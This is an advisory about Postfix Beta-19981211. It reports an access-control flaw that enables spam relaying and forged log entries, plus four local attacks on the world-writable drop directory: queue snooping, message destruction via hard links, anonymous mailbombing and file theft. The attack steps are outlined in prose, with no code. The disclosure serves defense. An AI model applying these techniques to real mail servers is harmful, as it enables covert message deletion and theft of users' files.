COMMAND

    postfix

SYSTEMS AFFECTED

    Postfix Beta-19981211

PROBLEM

    Robert Keyes found this.  This bug effects the access control used
    by  postfix.   By  subverting  the  access  control  mechanism, an
    attacker could  use a  postfix server  as a  relay for SPAM (UCE).
    This can result in huge network load, having your server added  to
    black-hole lists, denial  of service attacks,  and much abuse  and
    frustration.

    In addition to the SPAM problems, this forged address is also what
    appears  in  the  system  logs  (although  the  IP address is also
    logged).   This  could  lead  an  unwary  sysadmin  to  think that
    connections, and possible attacks, were coming from a place  where
    they were not.

    D.J.  Bernstein  putted  more  light  into  this.   The IBM Secure
    Mailer, also known as Postfix, provides a mode-1777 directory  for
    users to drop off queue files. All incoming and outgoing  messages
    pass  through  this  mechanism.   This  deliberate design decision
    leads  to  four  obvious  security  holes,  of  varying  levels of
    applicability and severity, as  described here.  The  nastiest one
    is #2: selective anonymous message destruction.

    1. Anonymous snooping
    =====================
    SECURITY HOLE: Any local user  can stat() files in the  IBM Secure
    Mailer drop directory.
    IMPACT: Any local user can anonymously inspect the uids and  sizes
    of  new  messages.   It  doesn't  matter   how  well  the   system
    administrator  has  protected  his  process  list,  mail logs, and
    message  transport  mechanisms;  private  information  is   freely
    available  in  the  IBM  Secure  Mailer  queue.  One might naively
    respond  that  queued  messages  are  visible  for  only a moment.
    However, the  attacker can  drastically slow  down the  IBM Secure
    Mailer (for example, by  creating thousands of temporary  files in
    the drop directory) to give himself ample time to look for  queued
    messages.  Making the drop directory unreadable does not stop this
    attack, or even  slow it down  perceptibly.  Queue  file names are
    easy to predict.

    2. Anonymous message destruction
    ================================
    SECURITY HOLE: Any local user can make hard links to files in  the
    IBM Secure Mailer drop directory.
    IMPACT:  Under  the  IBM  Secure   Mailer,  any  local  user   can
    anonymously eliminate selected messages from the mail queue. It is
    impossible to  identify the  culprit after  the fact.   There  are
    several ways  to carry  out this  attack.   The attacker  can, for
    example, create a  temporary directory under  a weird name  inside
    the drop directory,  and link the  victim's message file  to a new
    name inside the temporary directory.   The IBM Secure Mailer  will
    then remove the original name because it has too many links.   The
    attacker can then remove the new link and the temporary directory.
    It is easy to avoid detection.

    3. Anonymous mailbombing
    ========================
    SECURITY HOLE: On (uncommon  but still extant) UNIX  variants that
    allow file giveaways, any local  user can create files in  the IBM
    Secure Mailer drop directory owned by another user.
    IMPACT: On UNIX variants that allow file giveaways, any local user
    can use  the IBM  Secure Mailer  to send  mail that  is logged  as
    another user.  This dodges mail accounting; it can be used to send
    anonymous mailbombs.   It is  impossible to  identify the  culprit
    after the fact.   Other MTAs are careful  to record the source  of
    each local  message.   They also  attempt to  record the source of
    remote messages,  specifically the  IP address  and optional extra
    information  supplied  by  the  remote  host; there are still some
    security  holes  here  that   permit  anonymous  mail  (and   mail
    destruction!), but all of those flaws will eventually be fixed  by
    cryptographic techniques.


    4. File theft
    =============
    SECURITY HOLE:  Any local  user can  make hard  links into the IBM
    Secure Mailer drop directory  from files visible elsewhere  in the
    filesystem.
    IMPACT: An  attacker can  force the  IBM Secure  Mailer to  send a
    victim's file as a  mail message, under the  following conditions:
    the file has mode 700; it is in a world-readable directory on  the
    right filesystem; it  happens to have  the right structure  for an
    outgoing mail  message; and  it is  removed by  the victim.  There
    are, as above, several ways  for the attacker to put  the victim's
    file into the  IBM Secure Mailer  drop directory with  the correct
    name and link count after the file is removed by the victim.

SOLUTION

    Nothing yet.